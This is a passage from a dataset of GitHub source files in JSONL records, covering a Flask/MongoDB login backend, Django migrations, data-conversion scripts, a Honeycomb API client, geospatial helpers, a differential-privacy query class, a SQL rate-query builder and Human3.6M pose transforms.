MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the collection\n projectCollection = db['Projects']\n\n # check if the project collection is empty or not -> avoid checking if project collection is empty\n if len(list(projectCollection.find())) != 0:\n # check if project exixts in db\n project = projectCollection.find_one({'projectID': projectID})\n\n if project is not None:\n if project['projectID'] == projectID:\n resultObject = {\n 'isError': False,\n 'statusCode': 200,\n 'message': f'Joined Project: {projectID} successfully!'\n }\n return resultObject\n else:\n resultObject = {\n 'isError': True,\n 'statusCode': 404,\n 'message': f'ProjectID {projectID} does not exist! Enter a valid projectID.'\n }\n return resultObject\n\n else:\n returnObject = {\n 'isError': True,\n 'statusCode': 404,\n 'message': f'There are no projects in the database.'\n }\n return returnObject\n\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# TODO: move in different files\n# make utility functions\n# make a standard object creation function\n# route for login\n@app.route('/api/login', methods=['POST'])\ndef login_user():\n # storing the request object\n username = request.json['username']\n password = request.json['password']\n\n result = checkUserInDB(username=username, password=password)\n\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n else:\n returnObject = createSuccessObject(\n statusCode=result['statusCode'], message=result['message'])\n # TODO:\n # returnObject = createLoginSucessObject(username=username)\n return jsonify(returnObject), result['statusCode']\n\n\n# validates username and password\ndef checkUserInDB(username, password):\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the collection\n usersCollection = db[USERS_COLLECTION]\n\n # check if the collection if empty of not -> avoid checking if collection is empty\n if len(list(usersCollection.find())) != 0:\n # check if user exixts and then validated the encryptedPassword with the one store in db\n if usersCollection.find_one({'username': username}):\n user = usersCollection.find_one({'username': username})\n passwordFromDB = user.get('password')\n if passwordValidation(\n passwordFromDB=passwordFromDB, passwordFromRequest=password):\n client.close()\n resultObject = {\n 'isError': False,\n 'statusCode': 200,\n 'message': 'Logged in successfully!'\n }\n return resultObject\n # if password is wrong, return error object\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 401,\n 'message': 'Username or Password is wrong. Please try again!'\n }\n return resultObject\n # if username is wrong, return error object\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 401,\n 'message': 'Username or Password is wrong. Please try again!'\n }\n return resultObject\n # if there is no user in db, return error\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 404,\n 'message': 'Users not found! Database has no users registered yet.'\n }\n return resultObject\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# this function validates the passwords from request and db\ndef passwordValidation(passwordFromDB, passwordFromRequest):\n # encode the password from request\n passwordFromRequest = passwordFromRequest.encode('utf-8')\n # use checkpw function to validate the two passwords and return a bool a value\n return bcrypt.checkpw(passwordFromRequest, passwordFromDB)\n\n\n# TODO: move in different files\n# make utility functions\n# make a standard object creation function\n# register user\n# route for register\n@app.route('/api/register', methods=[\"POST\"])\ndef register_user():\n # storing the request object\n username = request.json['username']\n password = request.json['password']\n\n result = addUser(username=username, password=password)\n\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n else:\n returnObject = createSuccessObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n\n\n# add user to db\ndef addUser(username, password):\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the collection\n usersCollection = db['Users']\n\n # check if the collection if empty of not -> to avoid the first user registration\n if len(list(usersCollection.find())) != 0:\n # checking for the username passed in the request, if already exists, return an object with an error\n if usersCollection.find_one({'username': username}):\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 409,\n 'message': 'User already exists'\n }\n return resultObject\n\n # create a new user\n newUser = {\n 'username': username,\n 'password': encrypt(password),\n }\n\n # insert user in the users collection\n usersCollection.insert_one(newUser)\n client.close()\n # return the success object\n resultObject = {\n 'isError': False,\n 'statusCode': 201,\n 'message': 'User added successfully!',\n }\n return resultObject\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# this function ecrypts the text passed to it\n# converts into binary\n# adds salt\n# hashes the text and salt together\ndef encrypt(text):\n # converting text to array of bytes\n bytes = text.encode('utf-8')\n # generating the salt\n salt = bcrypt.gensalt()\n # Hashing the text\n hash = bcrypt.hashpw(bytes, salt)\n return hash\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"argh15/apad-project-backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":26809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42900177464","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ticker', '0015_auto_20160910_2247'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='game',\n name='presses_json',\n field=models.TextField(default=None, blank=True, null=True),\n ),\n ]\n","repo_name":"meyerjo/ticker","sub_path":"ticker/migrations/0016_bup_presses.py","file_name":"0016_bup_presses.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70980129706","text":"import os\r\nimport json\r\nimport pandas as pd\r\n\r\ntest = False\r\ndata_dir = '../../data/TrainingData/clean_squad/'\r\ncsv_name = 'full_train.csv'\r\ncolumns = ['id', '文章', '問題', '選項1', '選項2', '選項3', '選項4', '答案']\r\n\r\n\r\ndef create_qa_item(row):\r\n if not test:\r\n answer_text = row['選項{}'.format(row['答案'])]\r\n answer_start = row['文章'].index(answer_text)\r\n answers = [{\r\n 'text': answer_text,\r\n 'answer_start': answer_start,\r\n 'is_impossible': False,\r\n }]\r\n\r\n qa_item = {\r\n 'question': row['問題'],\r\n 'id': row['id'],\r\n 'answers': answers,\r\n }\r\n else:\r\n qa_item = {\r\n 'question': row['問題'],\r\n 'id': row['id'],\r\n }\r\n return qa_item\r\n\r\n\r\ndef create_article(qa_list, context):\r\n paragraph = [{\r\n 'qas': qa_list,\r\n 'context': context,\r\n }]\r\n # only one paragraph per article\r\n article = {\r\n 'title': \"\",\r\n 'paragraphs': paragraph,\r\n }\r\n return article\r\n\r\n\r\ndef create_data_dict(df):\r\n data_list = []\r\n qa_list = []\r\n last_context = None\r\n for _, row in df.iterrows():\r\n context = row['文章']\r\n if context != last_context:\r\n data_list.append(create_article(qa_list, last_context))\r\n qa_list.clear()\r\n last_context = context\r\n qa_list.append(create_qa_item(row))\r\n data_dict = {\r\n 'version': 'v2.0',\r\n 'data': data_list,\r\n }\r\n return data_dict\r\n\r\n\r\nif __name__ == \"__main__\":\r\n df = pd.read_csv(os.path.join(data_dir, csv_name))\r\n data_dict = create_data_dict(df)\r\n\r\n with open(os.path.join(data_dir, csv_name.split('.')[0] + '.json'), 'w') as f:\r\n json.dump(data_dict, f)\r\n","repo_name":"a7532ariel/2019NLP_QA","sub_path":"utils/csv_to_json.py","file_name":"csv_to_json.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41586292540","text":"from functools import lru_cache\nimport os\n\nimport honeycomb_io\nimport minimal_honeycomb\n\n\nclass HoneycombCachingClient:\n __instance = None\n\n def __new__(cls):\n if cls.__instance is None:\n cls.__instance = super().__new__(cls)\n return cls.__instance\n\n def __init__(\n self,\n url=None,\n auth_domain=None,\n auth_client_id=None,\n auth_client_secret=None,\n auth_audience=None,\n ):\n url = os.getenv(\"HONEYCOMB_URI\", \"https://honeycomb.api.wildflower-tech.org/graphql\") if url is None else url\n auth_domain = (\n os.getenv(\"HONEYCOMB_DOMAIN\", os.getenv(\"AUTH0_DOMAIN\", \"wildflowerschools.auth0.com\"))\n if auth_domain is None\n else auth_domain\n )\n auth_client_id = (\n os.getenv(\"HONEYCOMB_CLIENT_ID\", os.getenv(\"AUTH0_CLIENT_ID\", None))\n if auth_client_id is None\n else auth_client_id\n )\n auth_client_secret = (\n os.getenv(\"HONEYCOMB_CLIENT_SECRET\", os.getenv(\"AUTH0_CLIENT_SECRET\", None))\n if auth_client_secret is None\n else auth_client_secret\n )\n auth_audience = (\n os.getenv(\"HONEYCOMB_AUDIENCE\", os.getenv(\"API_AUDIENCE\", \"wildflower-tech.org\"))\n if auth_audience is None\n else auth_audience\n )\n\n if auth_client_id is None:\n raise ValueError(\"HONEYCOMB_CLIENT_ID (or AUTH0_CLIENT_ID) is required\")\n if auth_client_secret is None:\n raise ValueError(\"HONEYCOMB_CLIENT_SECRET (or AUTH0_CLIENT_SECRET) is required\")\n\n token_uri = os.getenv(\"HONEYCOMB_TOKEN_URI\", f\"https://{auth_domain}/oauth/token\")\n\n self.client: minimal_honeycomb.MinimalHoneycombClient = honeycomb_io.generate_client(\n uri=url,\n token_uri=token_uri,\n audience=auth_audience,\n client_id=auth_client_id,\n client_secret=auth_client_secret,\n )\n\n self.client_params = {\n \"client\": self.client,\n \"uri\": url,\n \"token_uri\": token_uri,\n \"audience\": auth_audience,\n \"client_id\": auth_client_id,\n \"client_secret\": auth_client_secret,\n }\n\n @lru_cache(maxsize=50)\n def fetch_camera_devices(self, environment_id=None, environment_name=None, start=None, end=None, chunk_size=200):\n return honeycomb_io.fetch_devices(\n device_types=honeycomb_io.DEFAULT_CAMERA_DEVICE_TYPES,\n environment_id=environment_id,\n environment_name=environment_name,\n start=start,\n end=end,\n output_format=\"dataframe\",\n chunk_size=chunk_size,\n **self.client_params,\n )\n\n @lru_cache(maxsize=100)\n def fetch_camera_calibrations(self, camera_ids: tuple, start=None, end=None, chunk_size=100):\n return honeycomb_io.fetch_camera_calibrations(\n camera_ids=list(camera_ids), start=start, end=end, chunk_size=chunk_size, **self.client_params\n )\n\n @lru_cache(maxsize=50)\n def fetch_camera_info(self, environment_name, start=None, end=None, chunk_size=100):\n return honeycomb_io.fetch_camera_info(\n environment_name=environment_name, start=start, end=end, chunk_size=chunk_size\n )\n\n @lru_cache(maxsize=20)\n def fetch_environment_by_name(self, environment_name):\n return honeycomb_io.fetch_environment_by_name(environment_name)\n\n @lru_cache(maxsize=50)\n def fetch_environment_id(self, environment_name):\n return honeycomb_io.fetch_environment_id(environment_name=environment_name)\n\n def get_environment_id(self, environment_id=None, environment_name=None):\n if environment_id is not None:\n return environment_id\n\n return self.fetch_environment_id(environment_name=environment_name)\n\n @lru_cache()\n def fetch_all_environments(self):\n return honeycomb_io.fetch_all_environments(output_format=\"dataframe\", **self.client_params)\n\n @lru_cache(maxsize=10)\n def fetch_device_ids(\n self,\n environment_id=None,\n environment_name=None,\n device_types: tuple = None,\n device_ids: tuple = None,\n part_numbers: tuple = None,\n serial_numbers: tuple = None,\n start=None,\n end=None,\n chunk_size=200,\n ):\n return honeycomb_io.fetch_device_ids(\n device_types=list(device_types) if device_types else None,\n device_ids=list(device_ids) if device_ids else None,\n part_numbers=list(part_numbers) if part_numbers else None,\n serial_numbers=list(serial_numbers) if serial_numbers else None,\n tag_ids=None,\n names=None,\n environment_id=environment_id,\n environment_name=environment_name,\n start=start,\n end=end,\n chunk_size=chunk_size,\n **self.client_params,\n )\n\n @lru_cache(maxsize=200)\n def fetch_persons(self, person_ids: tuple = None):\n return honeycomb_io.fetch_persons(\n person_ids=list(person_ids) if person_ids else None,\n output_format=\"dataframe\",\n **self.client_params,\n )\n","repo_name":"WildflowerSchools/wf-process-cuwb-data","sub_path":"process_cuwb_data/honeycomb_service/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12080231366","text":"import math\nfrom functools import partial\nimport geopandas as gpd\nimport pyproj\nfrom shapely.ops import nearest_points, transform\nfrom shapely.geometry import Polygon, Point\n\n\ndef dist_to_nearest_neighbour(df, epsg=3857):\n\n \"\"\"\n Считает минимальное расстояние до ближайшего соседнего банкомата\n \n df -- геофрейм с данными о банкоматах\n epsg -- желаемая проекция геофрейма (default:Pseudo-Mercator)\n \"\"\"\n\n df = df.copy().to_crs(epsg)\n for index, row in df.iterrows():\n point = row[\"geometry\"]\n multipoint = df.drop(index, axis=0)[\"geometry\"].unary_union\n _, nearest_geom = nearest_points(point, multipoint)\n df.loc[index, \"nearest_neighbour_atm\"] = nearest_geom.distance(point)\n\n return df\n\n\ndef geodesic_point_buffer(lon, lat, m):\n\n \"\"\"\n Чертит корректный буфер вокург точки с учетом проекции\n \n coords -- tuple с долготой и широтой точки\n m -- радиус буфера\n \"\"\"\n\n proj_wgs84 = pyproj.Proj(\"+proj=longlat +datum=WGS84\")\n\n aeqd_proj = \"+proj=aeqd +lat_0={lat} +lon_0={lon} +x_0=0 +y_0=0\"\n project = partial(\n pyproj.transform, pyproj.Proj(aeqd_proj.format(lon=lon, lat=lat)), proj_wgs84\n )\n\n buf = Point(0, 0).buffer(m)\n\n return transform(project, buf)\n\n\ndef points_in_buffer(point_df, poly_df, name, m=250):\n\n \"\"\"\n Считает количество точек из points_df в каждом полигоне из poly_df\n\n point_df -- Геофрейм с объектами инфраструктуры\n poly_df -- Геофрейм с омновной информацией по банкоматам\n m -- Радиус для буффера\n \"\"\"\n\n # Считаем буффер\n poly_df[\"{}m_buffer\".format(m)] = poly_df[\"geometry\"].buffer(m)\n # Меняем геометрию с точек на полигоны (буфферы)\n poly_df.set_geometry(\"{}m_buffer\".format(m), inplace=True)\n\n # Считаем количество точек из point_df в каждом полигоне из poly_df\n pts_in_poly = gpd.sjoin(point_df, poly_df, how=\"left\")\n pts_in_poly[\"const\"] = 1\n counter = pts_in_poly.groupby(\"index_right\")[\"const\"].sum()\n counter.name = \"{}_in_{}m\".format(name, m)\n\n # Чистим фрейм от колонки буффера и возвращаем исходную геометрию\n poly_df.drop(\"{}m_buffer\".format(m), axis=1, inplace=True)\n poly_df.set_geometry(\"geometry\", inplace=True)\n\n return counter\n\n\ndef find_epsg(lon, lat):\n \"\"\"Находит корректный EPSG по долготе и широте\"\"\"\n\n zone = (math.floor((lon + 180) / 6)) + 1\n epsg_code = 32600\n epsg_code += int(zone)\n if lat < 0:\n epsg_code += 100\n return epsg_code\n","repo_name":"jeromeshan/hse-mlds-atm","sub_path":"checkpoints-tasks/checkpoint-2/custom_functions.py","file_name":"custom_functions.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40538330566","text":"\"\"\"Module containing the class that queries the csv file\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nclass PrivateQuery():\n \"\"\"Private Query is a class that executes differentially private queries\n\n Parameters\n ----------\n path_to_dataset: str\n Path to dataset\n epsilon : double\n Level of Differential Privacy\n **kwargs : dict\n Keyword arguments to be passed to create csv file\n \"\"\"\n\n def __init__(self, path_to_dataset, epsilon, names, use_laplace=True, demo_mode=False):\n self.dataset = pd.read_csv(path_to_dataset, names=names, index_col=False)\n self.epsilon = epsilon\n self.cont_col, self.cat_col = self.preprocess()\n self.use_laplace = use_laplace\n self.demo_mode = demo_mode\n \n def preprocess(self, max_card=20, dep_var=None):\n \"\"\"\n Helper function that returns column names of cont and cat variables from given df.\n Copied from https://github.com/fastai/fastai/blob/master/fastai/tabular/transform.py\n \"\"\"\n cont_names, cat_names = [], []\n for label in self.dataset:\n if label == dep_var: continue\n if (self.dataset[label].dtype == int and self.dataset[label].unique().shape[0] > max_card) or \\\n (self.dataset[label].dtype == float):\n cont_names.append(label)\n else:\n cat_names.append(label)\n return cont_names, cat_names\n\n\n def count(self):\n \"\"\"Returns a differentially private count of rows in the database\n \n Parameters\n ----------\n col_name : str\n The name of the column whose values is to be counted\n \"\"\"\n if not self.demo_mode: return len(self.dataset) + self.get_noise()\n else: return (len(self.dataset), len(self.dataset) + self.get_noise)\n\n def get_noise(self):\n \"\"\"Returns Laplacian noise based on the created epsilon value\"\"\"\n if self.use_laplace:\n noise = np.random.laplace(scale=1/self.epsilon)\n else:\n noise = np.random.normal(scale=1/self.epsilon)\n \n return noise\n\n def categorical_count(self, col_name):\n \"\"\"Returns a differentially private count of categorical values \n \n Parameters\n ----------\n col_name : str\n Name of column\n \"\"\"\n # Step 1 - Count number of categories in each category\n col_dict = {}\n\n for i in range(len(self.dataset)):\n try:\n col_dict[self.dataset.iloc[i][col_name]] += 1\n except KeyError:\n col_dict[self.dataset.iloc[i][col_name]] = 1\n\n # Step 2 - Add noise to the distribution\n if self.demo_mode:\n col_dict_w_noise = col_dict.copy()\n for keys in col_dict_w_noise:\n col_dict_w_noise[keys] += self.get_noise()\n return (col_dict, col_dict_w_noise)\n else:\n for keys in col_dict:\n col_dict[keys] += self.get_noise()\n return col_dict\n \n\n def average(self, col_name):\n \"\"\"Returns differentially private average of continuous values\n \n Parameters\n ----------\n col_name : str\n Name of column for whose average is to be calculated\n \"\"\"\n # Create \n sum = 0\n for i in range(len(self.dataset)):\n sum += self.dataset.iloc[i][col_name]\n \n avg = sum/len(self.dataset)\n\n if self.demo_mode:\n return (avg, avg + self.get_noise())\n else:\n return avg + self.get_noise()\n","repo_name":"vijayantajain/Differential-Privacy","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3521321176","text":"from pygooglenews import GoogleNews\nimport json\n\n\ndef main():\n gn = GoogleNews(lang = 'en', country = 'US')\n n = gn.search(\"AAPL\", when=\"1m\")\n i = 0\n\n print(type(n[\"entries\"]))\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"davidknight00/stockInfinity","sub_path":"stockInfinity/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"24199652386","text":"import re\nfrom string import Template\n\n\n# This query will be used if one of source/destination is a port\nport_query = lambda port_code: f\"\"\"\nselect code from ports where ports.code = '{port_code}'\n\"\"\"\n\n\n# This query will be used if one of source/destination is a region, to fetch all the port codes recursively\nregion_query = lambda region_code: f\"\"\"\nwith RECURSIVE children AS (\n select slug, name, parent_slug from regions where slug = '{region_code}'\n union\n select r.slug, r.name, r.parent_slug \n from regions r inner join children as c \n on r.parent_slug = c.slug \n)\nselect p.code from children c\njoin ports p on p.parent_slug = c.slug\n\"\"\"\n\n\nclass RateQuery:\n \"\"\"\n This class provides an abstraction over the rates query that will be used to fetch the prices,\n providing methods to manipulate the query according to filters, ordering and pagination.\n\n It has two properties, \n - query: Outputs the final query to fetch the results.\n - counter_query: Outputs the query to find the total_count.\n\n Example Usage: \n ```\n rate_query = RateQuery().add_source_destination_filter(\n source=\"CNGGZ\", destination=\"northern_europe\"\n ).add_dates_filter(\n date_from=\"2016-01-1\"\n ).add_pagination_params(\n 1, 20\n ).add_ordering(\n 'dd'\n )\n ```\n \n Example Query:\n ```\n with base as ( \n select day, (\n case \n when count(*) < 3 then null else round(avg(price))\n end\n ) as avg_price from prices\n WHERE orig_code in (\n with RECURSIVE children AS (\n select slug, name, parent_slug from regions where slug = 'china_main'\n union\n select r.slug, r.name, r.parent_slug \n from regions r inner join children as c \n on r.parent_slug = c.slug \n )\n select p.code from children c\n join ports p on p.parent_slug = c.slug\n \n )\n and dest_code in (\n with RECURSIVE children AS (\n select slug, name, parent_slug from regions where slug = 'northern_europe'\n union\n select r.slug, r.name, r.parent_slug \n from regions r inner join children as c \n on r.parent_slug = c.slug \n )\n select p.code from children c\n join ports p on p.parent_slug = c.slug\n \n )\n group by day\n ),\n min_max_dates as (\n select max(day) as max_date, min(day) as min_date from base\n ),\n date_range as (\n SELECT date_trunc('day', dd):: date as dd\n FROM generate_series((select min_date from min_max_dates)::timestamp , (select max_date from min_max_dates)::timestamp, '1 day'::interval) dd\n )\n select dd, avg_price from base right join date_range on base.day = date_range.dd;\n ```\n \"\"\"\n\n code_pattern = r'[A-Z]{5}'\n region_slug_pattern = r'[a-z_]+'\n\n @classmethod\n def is_port(cls, port_or_region: str):\n return re.match(cls.code_pattern, port_or_region)\n\n @classmethod\n def is_region(cls, port_or_region: str):\n return re.match(cls.region_slug_pattern, port_or_region)\n\n def __init__(self) -> None:\n # Base query template, will be subsituted by filtering clause. \n self._base_query_template = Template(\n f\"\"\"\n with base as ( \n select day, (\n case \n when count(*) < 3 then null else round(avg(price))\n end\n ) as avg_price from prices\n $filter_clause\n group by day\n ),\n min_max_dates as (\n select max(day) as max_date, min(day) as min_date from base\n ),\n date_range as (\n SELECT date_trunc('day', dd):: date as dd\n FROM generate_series((select min_date from min_max_dates)::timestamp , (select max_date from min_max_dates)::timestamp, '1 day'::interval) dd\n ) \n \"\"\"\n )\n\n # Result query template, will be subsituted by ordering and pagination clauses.\n self._result_query_template = Template(\"\"\" \n select dd, avg_price from base right join date_range on base.day = date_range.dd $ordering_clause $pagination_clause;\n \"\"\"\n )\n\n # Counter query template, will be subsituted by ordering and pagination clauses.\n self._count_query = \"select count(*) from base right join date_range on base.day = date_range.dd\";\n\n # Cached property for result query\n self._query = ''\n \n # Private properties will store filtering, ordering clauses that will be applied later.\n self._filters = []\n self._ordering = []\n self._page = None\n self._page_size = None\n\n def _finalize(self):\n \"\"\"\n Method to finalize the result query.\n \"\"\"\n self._query = self._base_query_template.substitute(\n filter_clause=self.apply_filters(), \n )\n self._query = self._query + self._result_query_template.substitute(\n ordering_clause=self.apply_ordering(),\n pagination_clause=self.apply_pagination()\n )\n\n return self\n\n def apply_filters(self):\n filter_clause=''\n filters = filter(lambda f: f, self._filters)\n if filters:\n filter_clause = 'WHERE ' + '\\nand\\n'.join(filters)\n \n return filter_clause\n\n def apply_ordering(self):\n ordering_clause = ''\n if self._ordering:\n ordering_clause = ' '.join([\n 'ORDER BY', \n ', '.join(\n [' '.join([order_column, order]) for order_column, order in self._ordering]\n )\n ])\n \n return ordering_clause\n\n def apply_pagination(self):\n pagination_clause = ''\n if self._page or self._page_size:\n self._page = self._page or 1\n self._page_size = self._page_size or 10\n pagination_clause = f'LIMIT {self._page_size} OFFSET {(self._page - 1) * self._page_size}'\n return pagination_clause\n\n def add_ordering(self, ordering: str, order: str='ASC'):\n self._ordering.append((ordering, order))\n return self\n\n def add_source_destination_filter(self, source: str, destination: str):\n source_query = port_query(source) if self.is_port(source) else region_query(source)\n destination_query = port_query(destination) if self.is_port(destination) else region_query(destination)\n \n self._filters.append(f\"orig_code in ( {source_query})\")\n\n self._filters.append(f\"\"\"dest_code in (\n {destination_query}\n )\"\"\"\n )\n return self\n\n def add_dates_filter(self, date_from: str=None, date_to: str=None):\n query_components = []\n if date_from:\n query_components.append(f\"day >= '{date_from}'\")\n if date_to:\n query_components.append(f\"day <= '{date_to}'\")\n\n self._filters.append(\" and \".join(query_components))\n return self\n\n def add_pagination_params(self, page: int = 1, page_size: int = 10):\n if page:\n self._page = page\n if page_size:\n self._page_size = page_size\n return self \n\n\n @property\n def query(self):\n self._finalize() \n return self._query\n\n @property\n def counter_query(self):\n return self._base_query_template.substitute(\n filter_clause=self.apply_filters(), \n ) + self._count_query","repo_name":"deb999983/xeneta_ratestask","sub_path":"app/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":8257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29663445954","text":"#!/user/baojiong/projects/pycharmprojects/env/python\n\n# encoding: utf-8\n\nfrom django.urls import path, re_path\nfrom . import views\n\nurlpatterns = [\n #path('', views.home_page, name='home'),\n re_path(r'^$', views.home_page, name='home'),\n re_path(r'^lists/(\\d+)/$', views.view_list, name='view_list'),\n path('lists/new', views.new_list, name='new_list'),\n re_path(r'^lists/(\\d+)/add_item$', views.add_item, name='add_item')\n # path('lists/2/add_item', views.add_item, name='add_item')\n]\n","repo_name":"baojiong/superlists","sub_path":"lists/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37157909695","text":"#!/usr/bin/env python2\n\nimport csv\n\n\"\"\" Converts a string read from a file or stdin to a dictionary \"\"\"\ndef lineToDict(line):\n for row in csv.reader([line]):\n return {'id': row[0], 'desc': row[1], 'form': row[2], 'qty': row[3]}\n\n\"\"\" Converts a dictionary object back into a CSV-separated string \"\"\"\ndef dictToLine(dict):\n string = \"\"\n for key in ['id', 'desc', 'form', 'qty']:\n string += dict[key]\n string += \",\"\n return string.rstrip(\",\")\n\n \n","repo_name":"matthazinski/ece2524","sub_path":"hw4/parserecord.py","file_name":"parserecord.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32824120573","text":"from typing import Tuple, Union\n\nimport torch\nfrom torchvision.transforms import ToTensor as ImageToTensor\n\nfrom data.transforms import (\n MaskToTensor,\n DynamicSquareCrop,\n Resize,\n stabilized_padding,\n)\nfrom data.Human36M.skeleton import JOINTS\nfrom data.Human36M.statistics import MEDIAN_PIXEL\n\nfrom geometry.extrinsic import world_to_camera\n\n\nclass Human36MImageTransform(object):\n def __init__(\n self,\n cr_margin: float = None,\n re_size: Union[int, Tuple[int, int]] = None,\n ):\n self.i2t = ImageToTensor()\n self.m2t = MaskToTensor()\n\n self.crop = None\n if cr_margin is not None:\n self.crop = DynamicSquareCrop(margin=cr_margin)\n\n self.resize = None\n if re_size is not None:\n self.resize = Resize(size=re_size)\n\n def __call__(self, input: dict) -> dict:\n p = input[\"pose_2d\"]\n c = torch.ones(len(JOINTS), 1, 1, dtype=torch.bool)\n input[\"pose_2d\"] = {\n \"p\": p,\n \"c\": c,\n }\n\n p = input[\"pose_3d\"]\n p = world_to_camera(\n xyz=p,\n R=input[\"R\"][None, :, :],\n t=input[\"t\"][None, :, :],\n )\n c = torch.ones(len(JOINTS), 1, 1, dtype=torch.bool)\n input[\"pose_3d\"] = {\n \"root\": {\n \"p\": p[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n \"c\": c[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n },\n \"relative\": {\n \"p\": p - p[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n \"c\": c & c[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n },\n }\n\n x_off, y_off = 0.0, 0.0\n if self.crop:\n p, c = input[\"pose_2d\"][\"p\"], input[\"pose_2d\"][\"c\"]\n points = p[c.expand_as(p)].reshape(-1, 2, 1)\n points = points if len(points) > 0 else p\n (m, _), (M, _) = points.min(dim=-3), points.max(dim=-3)\n x_m, y_m = m.squeeze(dim=-1).tolist()\n x_M, y_M = M.squeeze(dim=-1).tolist()\n input[\"image\"], (x_off, y_off) = self.crop(\n image=input[\"image\"],\n bounds=(x_m, y_m, x_M, y_M),\n )\n input[\"mask\"], (_, _) = self.crop(\n image=input[\"mask\"],\n bounds=(x_m, y_m, x_M, y_M),\n )\n input[\"K\"] = input[\"K\"] - torch.tensor(\n [\n [0.0, 0.0, x_off],\n [0.0, 0.0, y_off],\n [0.0, 0.0, 0.0],\n ]\n )\n # input[\"pose_2d\"][\"p\"] = input[\"pose_2d\"][\"p\"] - torch.tensor([[x_off], [y_off]])\n input[\"crop_offset\"] = torch.tensor([x_off, y_off])\n input[\"cropped_resolution\"] = torch.tensor(input[\"image\"].size)\n\n if self.resize:\n input[\"image\"], (w_r, h_r) = self.resize(image=input[\"image\"])\n input[\"mask\"], (_, _) = self.resize(image=input[\"mask\"])\n input[\"K\"] = input[\"K\"] * torch.tensor(\n [\n [w_r, 1.0, w_r],\n [1.0, h_r, h_r],\n [1.0, 1.0, 1.0],\n ]\n )\n # input[\"pose_2d\"][\"p\"] = input[\"pose_2d\"][\"p\"] * torch.tensor([[w_r], [h_r]])\n input[\"resized_resolution\"] = torch.tensor(input[\"image\"].size)\n\n input[\"stabilized_padding\"] = stabilized_padding(\n crop_offset=input[\"crop_offset\"],\n original_resolution=input[\"resolution\"],\n cropped_resolution=input[\"cropped_resolution\"],\n resized_resolution=input[\"resized_resolution\"],\n )\n\n input[\"image\"] = self.i2t(input[\"image\"])\n input[\"mask\"] = self.m2t(input[\"mask\"])\n # input[\"masked_image\"] = input[\"mask\"] * input[\"image\"]\n input[\"masked_image\"] = (\n input[\"mask\"] * input[\"image\"]\n + ~input[\"mask\"] * MEDIAN_PIXEL[..., None, None]\n )\n\n return input\n\n\nclass Human36MImagePairTransform(object):\n def __init__(\n self,\n cr_margin_A: Union[float, Tuple[float, 